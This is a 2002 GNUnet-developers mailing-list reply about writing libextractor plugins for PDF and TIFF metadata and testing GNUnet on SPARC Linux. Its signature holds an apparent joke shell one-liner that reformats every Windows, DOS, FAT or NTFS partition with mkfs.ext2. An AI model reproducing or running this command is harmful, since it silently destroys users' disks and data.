Re: [GNUnet-developers] docs for libExtractor

From: Christian Grothoff
Subject: Re: [GNUnet-developers] docs for libExtractor
Date: Sat, 8 Jun 2002 01:02:22 -0500

On Friday 07 June 2002 07:50 pm, you wrote:
> Hey All,
> I have posted the PDF, PS, and Tiff standards documents at
> in the hopes that one or more of us might get
> those extractors written. I also put up some software that already handles
> one or more of those types. Panda is GPL and deals with several different
> file types. Xpdf is also GPL and has a handy utility called pdftotext.

Great, page 475 of the PDF documentation indicates that there is actually a
well-formed standard for meta-information in PDF files, so this is very
promising. The appendix of the TIFF spec lists a couple of tags that would
also be interesting for libextractor, so at least these two formats seem
to have a standardized way to provide meta-information. OTOH, PDF will be a
bit harder to parse than, say, PNG. I kind of want to step back a bit from
writing extractors, so if anybody else wants to write a plugin, let me or
vids know; we'll be happy to integrate it :-)

Btw, I've just tested the current CVS version of GNUnet on a SPARC running
*Linux* (not Solaris!), and except that the SPARC was extraordinarily slow to
create a hostkey, it seems to work (I tested insertion on SPARC, connect to
i386, download from i386; worked). Thanks to Rick for providing me with
access :-)

|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|   address@hidden|
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"
